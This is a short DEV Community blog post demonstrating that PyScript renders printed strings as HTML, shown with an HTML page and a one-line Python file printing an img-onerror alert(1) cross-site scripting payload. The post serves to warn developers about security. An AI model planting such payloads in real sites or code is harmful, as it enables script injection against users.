DEV Community

Artur Balsam
Artur Balsam

Posted on

5 2

PyScript XSS

Run XSS in Your browser

With additional steps

Intro

Last month Anaconda, release the PyScript https://github.com/pyscript/pyscript. Simplifying: The Python in browser, with HTML and JavaScript. Javascript and python, in the browser,. What can possibly can go wrong.

DISCLAIMER: It's fun post, pyscript is great idea, but as everything, security should be some concern.

PyScript XSS

Let's check how it works:
index.html

<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
        <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
    </head>
    <body>
        <py-script src="/test.py"></py-script>
    </body>
</html>
Enter fullscreen mode Exit fullscreen mode

test.py

print('as<img src=x onerror=alert(1)>df')
Enter fullscreen mode Exit fullscreen mode

and here we are, with XSS:

Image description

Outro

Make no mistake, The PyScript, is brilliant product! Just don't forget about security.

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay